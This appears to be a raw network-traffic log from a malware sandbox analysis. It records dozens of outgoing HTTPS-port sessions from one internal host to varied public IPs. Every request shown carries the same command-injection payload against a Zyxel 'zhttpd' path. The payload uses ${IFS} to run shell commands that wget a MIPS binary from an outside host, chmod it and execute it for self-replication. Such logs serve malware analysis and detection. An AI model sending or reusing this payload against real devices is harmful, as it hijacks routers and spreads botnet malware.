                                      Jan 19, 2024 17:29:31.753746986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4238192.168.2.143998052.161.14.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753799915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4239192.168.2.144004277.234.117.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753848076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4240192.168.2.1451496207.254.220.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753904104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4241192.168.2.1437582167.60.177.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753926039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4242192.168.2.1442412101.45.72.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753957033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4243192.168.2.144192890.110.144.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753995895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4244192.168.2.1452910139.77.119.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754018068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4245192.168.2.1458530179.238.160.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754060984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4246192.168.2.1448394133.80.50.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754091024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4247192.168.2.1435250218.222.185.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754118919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4248192.168.2.146045687.239.230.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754146099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4249192.168.2.1440080205.214.126.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754175901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4250192.168.2.145964635.8.177.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754228115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4251192.168.2.145922689.208.55.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754265070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4252192.168.2.1446220203.16.6.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754298925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4253192.168.2.144023681.195.72.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754354954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4254192.168.2.14581002.65.145.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754400969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4255192.168.2.1454132143.16.72.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754436970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4256192.168.2.143937617.64.91.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754497051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4257192.168.2.1439804168.112.217.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754514933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4258192.168.2.145167883.196.202.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754592896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4259192.168.2.144978464.211.194.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754611015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4260192.168.2.145682852.140.8.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754647970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4261192.168.2.1442446192.140.67.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754695892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4262192.168.2.1458442191.10.29.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754724026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4263192.168.2.1437068210.186.238.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754776955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4264192.168.2.145144045.168.107.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754816055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4265192.168.2.1454012113.86.200.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754888058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4266192.168.2.14417901.60.88.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754914999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4267192.168.2.143533444.181.19.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754933119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4268192.168.2.1436302103.66.107.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.754997969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4269192.168.2.1439474191.228.177.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.755011082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4270192.168.2.1437420109.174.251.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.755081892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4271192.168.2.1450886207.250.5.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.755131006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4272192.168.2.143384432.243.24.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.755182028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4273192.168.2.1456434200.170.131.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.755194902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4274192.168.2.145700823.135.130.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.755247116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4275192.168.2.145639299.171.190.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.755286932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4276192.168.2.1452566186.59.74.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.755325079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4277192.168.2.144783034.146.21.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.755347013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4278192.168.2.146024217.184.182.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.758729935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4279192.168.2.144307014.249.62.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.758774042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4280192.168.2.144304895.166.134.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.758801937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4281192.168.2.1440794211.27.183.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.758887053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4282192.168.2.144156820.65.37.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.758918047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4283192.168.2.145086845.239.20.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.758939028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4284192.168.2.1452660201.241.212.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.758965015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4285192.168.2.144138289.248.7.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759006023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4286192.168.2.143411892.167.25.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759051085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4287192.168.2.1454938138.56.30.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759074926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4288192.168.2.145587853.183.228.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759113073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4289192.168.2.1443584105.72.43.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759149075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4290192.168.2.145932688.78.153.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759197950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4291192.168.2.145291413.9.64.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759243965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4292192.168.2.144735889.246.198.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759273052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4293192.168.2.144192445.85.145.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759299040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4294192.168.2.145669641.140.20.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759354115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4295192.168.2.1439364155.192.39.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759397984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4296192.168.2.1459592138.77.170.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759423971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4297192.168.2.1436164160.103.200.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759459972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4298192.168.2.1459068173.134.138.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759497881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4299192.168.2.146077665.198.159.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759527922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4300192.168.2.1448064151.181.29.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.759566069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4301192.168.2.1458746113.206.21.197443
                                      TimestampBytes transferredDirectionData
